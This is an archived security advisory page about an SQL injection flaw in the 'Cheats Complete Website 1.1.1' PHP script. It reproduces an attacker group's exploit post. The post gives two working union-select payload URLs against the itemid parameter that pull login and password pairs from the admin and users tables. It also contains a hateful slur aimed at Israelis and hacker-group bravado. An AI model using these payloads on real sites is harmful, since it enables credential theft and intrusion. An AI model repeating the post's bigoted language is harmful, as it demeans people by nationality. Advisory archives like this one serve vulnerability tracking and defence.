|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability
|
SecurityAlert : 4618
CVE : CVE-2008-5170
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : Cyb3r-1sT
Published : 22.11.2008
Affected Software : | easysitenetwork:cheats_complete_website:1.1.1 |
 Advisory Content :
| \ \____/ >> Kings of injection |
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at]
yahoo.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================
<<->> script : Cheats Website
<<->> Demo site : www.easysitenetwork.com/sites/cheats
=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================
<<->> D0rk : N0-WaY
<<->> Exploit :
<!> for admin inf0 ::
>>>>
www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a
,password),1,2,3,4,5+from+admin_login/*
<!> for members inf0 ::
>>>>
www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a
,password),1,2,3,4,5+from+users/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $
nicehacker $ anaconda-ksa $ sirus $ crazy-x
:: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y
<<->> InjEctOr5 TeaM
<<->> All muslims
References :
http://securityreason.com/expldownload/1/4202/1 (Exploit)
http://www.securityfocus.com/bid/29970
http://www.milw0rm.com/exploits/5950
http://secunia.com/advisories/30838
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|